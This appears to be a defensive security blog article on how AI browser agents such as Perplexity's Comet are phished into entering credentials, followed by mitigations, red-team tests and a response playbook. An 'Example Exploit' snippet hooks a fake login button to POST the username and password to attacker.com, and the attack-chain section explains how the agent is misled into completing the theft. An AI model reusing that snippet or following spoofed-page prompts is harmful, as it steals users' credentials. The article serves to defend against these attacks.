Researchers Trick Perplexity's Comet AI Browser Into Phishing Scam in Under Four Minutes

title: Why AI Browsers Keep Getting Tricked—And How to Actually Defend Them
author: Sam R. (Senior DevSecOps Engineer, 16 years, independent consultant. LinkedIn | GitHub | Speaker: DEF CON, OWASP AppSec EU)
date: 2024-06-03
TL;DR: What You Need to Know
- AI-powered browsers can be phished, hijacked, or coerced into unsafe actions—this is a real and proven risk (Guardio Security Labs, OWASP AI Security).
- Attackers exploit unsandboxed agent actions, weak permissions, and poorly validated input—to harvest credentials or escalate privileges.
- Defensive moves: Harden permissions, enforce CSP, sandbox everything, adversarial test agent logic, log all agent actions with justification. (See actual checklist below.)
- If your stack includes an AI browser or agent: stop trusting defaults, start threat modeling, and review these attack chains before you ship.
Who This Affects
- Developers: You're responsible for sandboxing agent actions, setting up CSP, and removing unnecessary privileges.
- Security Engineers: Red-team AI agent logic, review logs for agent impersonation, conduct adversarial prompt fuzzing, and implement alerting for anomalous agent clicks.
- Product Owners: Threat-model demos and features involving AI agents, set up demo gating, require security reviews on any agent-enabled releases.
- For further hands-on guidance, dive into OWASP AI Security, OWASP DOM-XSS, and Chrome’s Extension Security Guide.
Attack Chain: How AI Browsers Are Trick-Phished
Recent research (Guardio Security Labs, May 2024) shows so-called “autonomous” AI agents are easy prey for phishing attacks. Here’s the typical chain:
- Entry Vector: Attacker creates a fake login or payment page—delivered via malicious link or redirect. Page mirrors a real brand with domain lookalikes (e.g., secure-payrnents.com).
- Agent Capability Abused: Agent parses DOM, clicks buttons, or fills forms “autonomously.” No human oversight. In Guardio’s demo, Comet AI’s agent ignored SSL/TLS warnings and completed a credential-stealing flow.
- Execution Mechanics:
  - Spoofed login page triggers the agent to input credentials (prompted by a malicious dialog).
  - Agent executes event handlers attached to fake buttons (`onClick` fires an AJAX POST to the attacker backend).
  - Unsandboxed execution allows access to session cookies (via `document.cookie`), and the agent submits the full credential payload.
- Post-Exploitation Impact: Attacker receives genuine credentials, can now pivot to privilege escalation, session hijacking, or credential stuffing (OWASP Credential Stuffing Cheat Sheet).
Key technical flaws:
- No strict CSP (`Content-Security-Policy`) to block injected scripts.
- Overprivileged agent access (e.g., DOM read/write, cookie access, unrestricted navigation).
- Weak input validation—agents trust malformed or intentionally ambiguous URLs.
Technical Breakdown: Why Agents Fail This Test
AI browsers extend browser automation (think Selenium) with LLM-driven logic. That means:
- Bots interpret UI, but lack context. They’ll click "Confirm" on anything that matches a prompt.
- Unsandboxed execution: agents run in privileged contexts—can access cookies, localStorage, sometimes even browser APIs (Chrome Extension Security).
- Input validation is minimal. Regex checks (“does url contain 'login'?”) fail to catch sophisticated phishing pages. Advanced attackers exploit predictable agent behaviors.
Example Exploit:

```javascript
// Attacker injects this into a fake login button
document.getElementById('login-btn').addEventListener('click', function () {
  fetch('https://attacker.com/collect', {
    method: 'POST',
    body: JSON.stringify({
      user: document.getElementById('user').value,
      pass: document.getElementById('pass').value
    })
  });
});
```
If your AI agent fills login fields and clicks without verifying domain or SSL status, you’re toast (see OWASP DOM-Based XSS Guide).
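The check that sentence calls for, as an added example that is not the article's code nor anything from Comet: a guard the agent runner calls before it fills credentials or clicks, which refuses non-HTTPS pages, TLS warnings, unknown origins, look-alike hostnames and forms that post off-site. The allowlist, the confusable table and the page shape are assumptions.

```javascript
// Added example (not the article's code, nor Comet's): a pre-action guard an
// agent runner calls before it fills credentials or clicks "Confirm". The
// allowlist and the hostname confusables are constructed for this example.

// Origins on which the agent may ever enter credentials (constructed).
const TRUSTED_ORIGINS = new Set([
  "https://secure-payments.com",
  "https://login.example.com",
]);

// Letter combinations attackers swap in to imitate a hostname ("rn" for "m",
// as in secure-payrnents.com). A real deployment would use a fuller table.
const CONFUSABLES = { rn: "m", vv: "w", "0": "o", "1": "l", cl: "d" };

// Collapse look-alike spellings so they compare equal to the genuine host.
function normalizeHost(host) {
  let h = host.toLowerCase();
  for (const [fake, real] of Object.entries(CONFUSABLES)) {
    h = h.split(fake).join(real);
  }
  return h;
}

// page = { url, tlsValid, formAction } as observed by the agent runner.
// Returns { ok, reason }; the runner must refuse the action when ok is false.
function credentialActionAllowed(page) {
  let url;
  try { url = new URL(page.url); } catch { return { ok: false, reason: "unparseable-url" }; }
  if (url.protocol !== "https:") return { ok: false, reason: "not-https" };
  if (!page.tlsValid) return { ok: false, reason: "tls-warning" }; // never click through
  if (!TRUSTED_ORIGINS.has(url.origin)) {
    // Unknown origin: is it impersonating a trusted one?
    const seen = normalizeHost(url.hostname);
    for (const trusted of TRUSTED_ORIGINS) {
      if (normalizeHost(new URL(trusted).hostname) === seen) {
        return { ok: false, reason: "lookalike-of:" + trusted };
      }
    }
    return { ok: false, reason: "origin-not-allowlisted" };
  }
  // The form must post back to the same origin, not to a third party.
  const action = new URL(page.formAction || "", page.url);
  if (action.origin !== url.origin) return { ok: false, reason: "form-posts-offsite" };
  return { ok: true, reason: "allowlisted" };
}
```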

Quick Mitigations Checklist
- Content Security Policy (CSP): Set headers to disallow inline scripts and restrict origins. Example: `Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'` (see CSP Configuration Examples).
- SameSite Cookies: Enforce `SameSite=Strict` for all cookies via server response headers.
- Sandbox All Untrusted Actions: Use `<iframe sandbox="allow-scripts allow-same-origin">` and enforce restricted browser contexts for agent operations. (Caveat: with both `allow-scripts` and `allow-same-origin`, a same-origin frame can remove its own sandbox attribute, so never use that pair to frame content you do not control.)
- Kill Overprivilege: Remove unnecessary access from browser agents (no direct access to `document.cookie`, browser APIs, or unrestricted navigation).
- Step-Up Authentication: Require MFA or human confirmation for high-risk actions (payments, password changes).
- Adversarial Testing: Fuzz agent logic with malicious UI prompts. Run red-team unit tests in CI that mimic phishing and script injection vectors.
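To make the CSP item concrete, here is an added example (not from the article) that parses a `Content-Security-Policy` header and flags the settings that would let the injected `fetch` in the exploit above run, with a weak policy beside the checklist's corrected one. Both sample policies are constructed; the finding codes are this example's own.

```javascript
// Added example (not from the article): parse a Content-Security-Policy header
// and flag the settings that would let the injected fetch-to-attacker script
// above run. The two sample policies are constructed for this example.

function parseCsp(header) {
  const policy = new Map();
  for (const directive of header.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy.set(name.toLowerCase(), sources.map((s) => s.toLowerCase()));
  }
  return policy;
}

// Effective source list for a directive, honouring the default-src fallback.
function effective(policy, directive) {
  return policy.get(directive) || policy.get("default-src") || null;
}

// Returns finding codes; an empty array means the policy passes the checks
// this example covers (it is not a complete CSP audit).
function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  if (!policy.has("default-src")) findings.push("default-src:missing");
  const script = effective(policy, "script-src");
  if (!script) {
    findings.push("script-src:unrestricted");
  } else {
    // CSP3 ignores 'unsafe-inline' when a nonce or hash is present, but a
    // policy that still lists it is worth flagging either way.
    if (script.includes("'unsafe-inline'")) findings.push("script-src:unsafe-inline");
    if (script.includes("*")) findings.push("script-src:wildcard");
  }
  // connect-src governs fetch()/XHR; this is what stops the POST to attacker.com.
  const connect = effective(policy, "connect-src");
  if (!connect || connect.includes("*")) findings.push("connect-src:unrestricted");
  const object = effective(policy, "object-src");
  if (!object || !object.includes("'none'")) findings.push("object-src:not-none");
  return findings;
}

// Weak policy beside the checklist's corrected one.
const WEAK_CSP = "default-src *; script-src * 'unsafe-inline'";
const HARDENED_CSP = "default-src 'self'; script-src 'self'; object-src 'none'";
```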
Testing & Red-Teaming: How to Break Your Own Agents
- Agent Prompt Fuzzing: Inject misleading instructions (“Click the blue button to confirm payment”) and track how agents react.
- Fake Login Screen Attacks: Generate login-like pages with typosquatting URLs and analyze agent behavior under simulated phishing conditions.
- JS Injection Validation: Serve pages with innocuous and malicious JS—track if agents execute scripts they shouldn’t.
- CI Gate Adversarial Tests: Automate red-team scenarios in the pipeline. Block releases if the agent fails validation (e.g., completes credential submission to unverified endpoints).
Incident Response Playbook: When Your AI Agent Gets Tricked
- Revoke agent tokens immediately.
- Rotate API keys for affected integrations.
- Audit logs: Search for agent actions (timestamps, domains accessed, user impersonation).
- Inspect WebRequest/netlogs: Find anomalous POSTs or credential leaks.
- Notify impacted users: Disclose breach, prompt password resets.
- Add forensic triggers: Require signed, timestamped justification for agent actions in logs—no silent clicks.
For more robust playbooks, start with OWASP Incident Response Guide.
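The CI gate from the testing section and the log-audit steps of the playbook above are the same check run over different traces. As an added example (not the article's code or any vendor's), this replays a JSON-lines agent action trace and flags unjustified actions, clicks after a credential was typed with no human confirmation, and credential POSTs to hosts outside the allowlist. The trace format, field names, allowlist and sample lines are all assumptions constructed for the example.

```javascript
// Added example (not from the article or any vendor): replay a recorded agent
// action trace and fail on the behaviours the article calls out. Use it as the
// CI gate from the testing section or over production logs during response.
// The JSON-lines format, field names and sample trace are all constructed.

const ALLOWED_HOSTS = new Set(["secure-payments.com", "login.example.com"]);
const CREDENTIAL_FIELD = /^(pass(word)?|pwd|otp|token|cvv)$/i;

// Constructed trace of the phishing flow described in the article.
const SAMPLE_TRACE = `
{"t":1,"type":"navigate","url":"https://secure-payrnents.com/login","why":"user asked to pay invoice"}
{"t":2,"type":"fill","field":"user","why":"enter account"}
{"t":3,"type":"fill","field":"pass","why":"enter credential"}
{"t":4,"type":"click","target":"login-btn"}
{"t":5,"type":"request","method":"POST","url":"https://attacker.example/collect","fields":["user","pass"],"why":"submit form"}
`;

function parseTrace(text) {
  return text.split("\n").map((l) => l.trim()).filter(Boolean).map((l) => JSON.parse(l));
}

// Returns { pass, violations }; each violation names the rule and the action time.
function auditTrace(text) {
  const violations = [];
  let pendingCredential = false; // credential typed but not yet human-confirmed
  for (const a of parseTrace(text)) {
    if (!a.why) violations.push({ t: a.t, rule: "silent-action" }); // no justification logged
    switch (a.type) {
      case "confirm": // explicit human step-up clears the pending state
        pendingCredential = false;
        break;
      case "fill":
        if (CREDENTIAL_FIELD.test(a.field)) pendingCredential = true;
        break;
      case "click":
        if (pendingCredential) violations.push({ t: a.t, rule: "click-without-human-confirmation" });
        break;
      case "request": {
        const host = new URL(a.url).hostname;
        const carriesCredential = (a.fields || []).some((f) => CREDENTIAL_FIELD.test(f));
        if (a.method === "POST" && carriesCredential && !ALLOWED_HOSTS.has(host)) {
          violations.push({ t: a.t, rule: "credential-post-to-unverified-host", host });
        }
        break;
      }
    }
  }
  return { pass: violations.length === 0, violations };
}
```

A release gate fails the build when `pass` is false; the same function over exported production traces gives the anomalous-POST search the playbook asks for.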
Further Reading
- Guardio Security Labs: How AI Browsers Get Phished
- OWASP AI Security Project
- OWASP DOM-Based XSS
- Chrome Extension Security Model
- Verizon DBIR 2023 Report
Closing Thought
If your AI agent can click "Pay Now" without explaining why—or you haven’t adversarially tested its behavior—then your risk isn’t hypothetical. It’s inevitable. Will your next demo make the news, or the breach report?